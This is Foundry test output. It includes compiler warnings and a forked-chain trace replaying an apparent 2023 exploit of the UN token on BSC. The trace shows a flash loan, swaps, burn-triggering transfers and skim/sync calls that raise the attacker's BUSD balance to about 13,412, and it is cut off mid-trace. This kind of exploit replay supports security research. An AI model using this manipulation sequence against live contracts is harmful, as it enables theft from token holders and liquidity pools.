Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.12s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UN_exp.sol:45:31:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UN_exp.sol:45:47:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UN_exp.sol:45:67:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UN_exp.sol:45:88:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.67s (1.84ms CPU time)

Ran 1 test for src/test/2023-06/UN_exp.sol:ContractTest
[PASS] testExploit() (gas: 489754)
Logs:
  Attacker BUSD balance before attack: 0.010000000000000000
  Attacker BUSD balance after attack: 13412.363310180390856151

Traces:
  [18637] AttackerContract::setUp()
    ├─ [0] VM::createSelectFork("bsc", 28864173 [2.886e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], "DPPOracle")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSD: [0x55d398326f99059fF775485246999027B3197955], "BUSD")
    │   └─ ← [Return]
    ├─ [0] VM::label(UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], "UN")
    │   └─ ← [Return]
    ├─ [0] VM::label(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], "AttackerContract")
    │   └─ ← [Return]
    ├─ [0] VM::label(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], "Pair")
    │   └─ ← [Return]
    └─ ← [Stop]

  [551654] AttackerContract::testExploit()
    ├─ [2531] BUSD::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [2425] BUSD::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker BUSD balance before attack", val: 10000000000000000 [1e16], decimals: 18)
    ├─ [526077] DPPOracle::flashLoan(0, 29100000000000000000000 [2.91e22], AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [10871] BUSD::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 29100000000000000000000 [2.91e22])
    │   │   ├─ emit Transfer(from: DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 29100000000000000000000 [2.91e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0xa1bb3ea675b840e963c59cc969a45ddfeefd63ae58d64dc7dba145305988350c: 0x000000000000000000000000000000000000000000007d810e1d17a659ddd1d0 → 0x0000000000000000000000000000000000000000000077578a7d0a0ebeadd1d0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x00000000000000000000000000000000000000000000062983c3948a0af10000
    │   │   └─ ← [Return] true
    │   ├─ [488863] AttackerContract::DPPFlashLoanCall(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 29100000000000000000000 [2.91e22], 0x00)
    │   │   ├─ [2517] Pair::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 186912581853851065964787 [1.869e23], 30265800773605712024588 [3.026e22], 1686054150 [1.686e9]
    │   │   ├─ [531] BUSD::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 29100010000000000000000 [2.91e22]
    │   │   ├─ [8071] BUSD::transfer(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], 29100010000000000000000 [2.91e22])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 29100010000000000000000 [2.91e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xd8776b14a84cffc722c75739a5b9592d5b44bb8fdfb6c5600d40936816dce39e: 0x000000000000000000000000000000000000000000000668b65c6882673d540c → 0x000000000000000000000000000000000000000000000c923a1ffd0c722e540c
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000062983c3948a0af10000 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [139752] Pair::swap(91480714664455701397200 [9.148e22], 0, AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [104336] UN::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 91480714664455701397200 [9.148e22])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 2744421439933671041916 [2.744e21])
    │   │   │   │   ├─ [25175] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(2744421439933671041916 [2.744e21])
    │   │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f0000000000000000000000000000000000000000000000000000000000000007000000000000000000000000000000000000000000000094c67f970d3c806b7c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 23: 0x00000000000000000000000000000000000006f1c767bc3668282157f2f68e4f → 0x000000000000000000000000000000000000074a991b8ccfd3e3818f0be690c5
    │   │   │   │   │   │   @ 25: 0x0000000000000000000000000000000000004fa82b87c942e6f9852858d8e9eb → 0x00000000000000000000000000000000000053a2fa5a22049c9b1109c2308dae
    │   │   │   │   │   │   @ 24: 0x000000000000000000000000000000000000351ac7afdb81ef5105aae50c1351 → 0x00000000000000000000000000000000000037c1fc3c16adbdbcb8412b46807e
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 914807146644557013972 [9.148e20])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 2744421439933671041916 [2.744e21])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 85077064637943802299396 [8.507e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x0000000000000000000000000000000000000000000027948d264ac6bc7ad8f3 → 0x0000000000000000000000000000000000000000000014355f33f50d866cda23
    │   │   │   │   │   @ 25: 0x0000000000000000000000000000000000004fa82b87c942e6f9852858d8e9eb → 0x00000000000000000000000000000000000053a2fa5a22049c9b1109c2308dae
    │   │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000b7f0f884a775e285d4c → 0x000000000000000000000000000000000000000000000c13d607e1849aa8c8c8
    │   │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000ba1d88df7b15acc4fcf → 0x000000000000000000000000000000000000000000000c369f0d8ebe974cbb4b
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000120409734a9a538d0404
    │   │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x0000000000000000000000000000000000000000000000029cd351497cbd2d8b → 0x00000000000000000000000000000000000000000000003434532e4de63d515f
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 95431867189395364567587 [9.543e22]
    │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   ├─ emit Sync(reserve0: 95431867189395364567587 [9.543e22], reserve1: 59365810773605712024588 [5.936e22])
    │   │   │   ├─ emit Swap(sender: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 29100010000000000000000 [2.91e22], amount0Out: 91480714664455701397200 [9.148e22], amount1Out: 0, to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x647f2506000000000668b65c6882673d540c0000000027948d264ac6bc7ad8f3 → 0x647f2509000000000c923a1ffd0c722e540c0000000014355f33f50d866cda23
    │   │   │   │   @ 10: 0x00000000000000000000000000000005d6407b6fed07465b289ad5e55109870b → 0x00000000000000000000000000000005d653026071ff049316114bd4a6f42227
    │   │   │   │   @ 9: 0x000000000000000000000000000000000098c457a60471fe9a4d143564a714c9 → 0x00000000000000000000000000000000009940b360fdeaa4514ea20e0f436c2a
    │   │   │   └─ ← [Stop]
    │   │   ├─ [623] UN::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 85077064637943802299396 [8.507e22]
    │   │   ├─ [57774] UN::transfer(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], 79121670113287736138438 [7.912e22])
    │   │   │   ├─ emit Transfer(from: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 963001100058046058847 [9.63e20])
    │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x0000000000000000000000000000000000000000, value: 31648668045315094455375 [3.164e22])
    │   │   │   ├─ [7804] Pair::sync()
    │   │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 64746200244138316171059 [6.474e22]
    │   │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   │   ├─ emit Sync(reserve0: 64746200244138316171059 [6.474e22], reserve1: 59365810773605712024588 [5.936e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x647f2509000000000c923a1ffd0c722e540c0000000014355f33f50d866cda23 → 0x647f2509000000000c923a1ffd0c722e540c000000000db5e60741f90e188733
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 2611015113738495292554 [2.611e21])
    │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(2611015113738495292554 [2.611e21])
    │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000008d8b1d1c31b729748a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 25: 0x00000000000000000000000000000000000053a2fa5a22049c9b1109c2308dae → 0x000000000000000000000000000000000000576c42f71bbfcaee4e0f51233808
    │   │   │   │   │   @ 24: 0x00000000000000000000000000000000000037c1fc3c16adbdbcb8412b46807e → 0x0000000000000000000000000000000000003a482ca4bd2a87498b9a353d9cba
    │   │   │   │   │   @ 23: 0x000000000000000000000000000000000000074a991b8ccfd3e3818f0be690c5 → 0x000000000000000000000000000000000000079f1987c21748d471df9cf52827
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 791216701132877361380 [7.912e20])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 2531893443625207556416 [2.531e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 1582433402265754722760 [1.582e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 71605111452525401205328 [7.16e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5: 0x000000000000000000000000000000000000000000003b28b3890ef6140169ca → 0x00000000000000000000000000000000000000000000423229b5bb9d5db3efe1
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000120409734a9a538d0404 → 0x000000000000000000000000000000000000000000000142d7b397246720e93e
    │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x00000000000000000000000000000000000000000000003434532e4de63d515f → 0x00000000000000000000000000000000000000000000002ae45665a2759070e4
    │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000c369f0d8ebe974cbb4b → 0x000000000000000000000000000000000000000000000cc42a2aaaf04e762fd5
    │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000c13d607e1849aa8c8c8 → 0x000000000000000000000000000000000000000000000c9d171c59f2dfaa3208
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 25: 0x00000000000000000000000000000000000053a2fa5a22049c9b1109c2308dae → 0x000000000000000000000000000000000000576c42f71bbfcaee4e0f51233808
    │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x0000000000000000000000000000000000000000000014355f33f50d866cda23 → 0x000000000000000000000000000000000000000000001cdf9e922fe79da87183
    │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000007cf43af01e35c21fd2c6c → 0x00000000000000000000000000000000000000000007c130c2a88a0d8e98203e
    │   │   │   └─ ← [Return] true
    │   │   ├─ [31770] Pair::skim(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 136351311696663717376387 [1.363e23]
    │   │   │   ├─ [20336] UN::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 71605111452525401205328 [7.16e22])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 2148153343575762036159 [2.148e21])
    │   │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(2148153343575762036159 [2.148e21])
    │   │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f0000000000000000000000000000000000000000000000000000000000000007000000000000000000000000000000000000000000000074739dc493f4f265bf00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 23: 0x000000000000000000000000000000000000079f1987c21748d471df9cf52827 → 0x00000000000000000000000000000000000007e49f1d4b041c3d94b3160151ff
    │   │   │   │   │   │   @ 25: 0x000000000000000000000000000000000000576c42f71bbfcaee4e0f51233808 → 0x0000000000000000000000000000000000005a89b7b96b89802bce87ac03be9e
    │   │   │   │   │   │   @ 24: 0x0000000000000000000000000000000000003a482ca4bd2a87498b9a353d9cba → 0x0000000000000000000000000000000000003c5bcfd0f25baac7e14457e0925f
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 716051114525254012053 [7.16e20])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 2148153343575762036159 [2.148e21])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 66592753650848623120957 [6.659e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 25: 0x000000000000000000000000000000000000576c42f71bbfcaee4e0f51233808 → 0x0000000000000000000000000000000000005a89b7b96b89802bce87ac03be9e
    │   │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x000000000000000000000000000000000000000000001cdf9e922fe79da87183 → 0x000000000000000000000000000000000000000000000db5e60741f90e188733
    │   │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000cc42a2aaaf04e762fd5 → 0x000000000000000000000000000000000000000000000d389dc86f8443689594
    │   │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x00000000000000000000000000000000000000000000002ae45665a2759070e4 → 0x000000000000000000000000000000000000000000000051b58afc7e71e13d79
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000142d7b397246720e93e → 0x000000000000000000000000000000000000000000000f5cd7ce650f107b3b7b
    │   │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000c9d171c59f2dfaa3208 → 0x000000000000000000000000000000000000000000000d118aba1e86d49c97c7
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   ├─ [3271] BUSD::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000142d7b397246720e93e → 0x000000000000000000000000000000000000000000000f5cd7ce650f107b3b7b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [623] UN::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 72548148175504689281915 [7.254e22]
    │   │   ├─ [44174] UN::transfer(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], 65293333357954220353723 [6.529e22])
    │   │   │   ├─ emit Transfer(from: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 1507267815658131373433 [1.507e21])
    │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x0000000000000000000000000000000000000000, value: 26117333343181688141489 [2.611e22])
    │   │   │   ├─ [7804] Pair::sync()
    │   │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 40136134716614759403003 [4.013e22]
    │   │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   │   ├─ emit Sync(reserve0: 40136134716614759403003 [4.013e22], reserve1: 59365810773605712024588 [5.936e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x647f2509000000000c923a1ffd0c722e540c000000000db5e60741f90e188733 → 0x647f2509000000000c923a1ffd0c722e540c00000000087fc8c2d267d633cdfb
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 2154680000812489271649 [2.154e21])
    │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(2154680000812489271649 [2.154e21])
    │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f0000000000000000000000000000000000000000000000000000000000000007000000000000000000000000000000000000000000000074ce311cc14ace696100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 25: 0x0000000000000000000000000000000000005a89b7b96b89802bce87ac03be9e → 0x0000000000000000000000000000000000005da998bdbdd13863721e17d28261
    │   │   │   │   │   @ 24: 0x0000000000000000000000000000000000003c5bcfd0f25baac7e14457e0925f → 0x0000000000000000000000000000000000003e71107e7e8b7aecf90285cd0622
    │   │   │   │   │   @ 23: 0x00000000000000000000000000000000000007e49f1d4b041c3d94b3160151ff → 0x000000000000000000000000000000000000082a5ac5b5f6aba4e498ef0d3f88
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 652933333579542203530 [6.529e20])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 2089386667454535051296 [2.089e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 1305866667159084407060 [1.305e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 59090466688948569420188 [5.909e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000f5cd7ce650f107b3b7b → 0x00000000000000000000000000000000000000000000018948c7d6e7e80c52c0
    │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000d389dc86f8443689594 → 0x000000000000000000000000000000000000000000000dad6bf98c458e36fef5
    │   │   │   │   @ 25: 0x0000000000000000000000000000000000005a89b7b96b89802bce87ac03be9e → 0x0000000000000000000000000000000000005da998bdbdd13863721e17d28261
    │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000d118aba1e86d49c97c7 → 0x000000000000000000000000000000000000000000000d82cecab6881564bfe7
    │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x000000000000000000000000000000000000000000000051b58afc7e71e13d79 → 0x00000000000000000000000000000000000000000000002365452f80643e8c8a
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000007c130c2a88a0d8e98203e → 0x00000000000000000000000000000000000000000007b59387f4f3ecaa1200b4
    │   │   │   │   @ 0xad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5: 0x00000000000000000000000000000000000000000000423229b5bb9d5db3efe1 → 0x000000000000000000000000000000000000000000004800c70f86adcff6ffa6
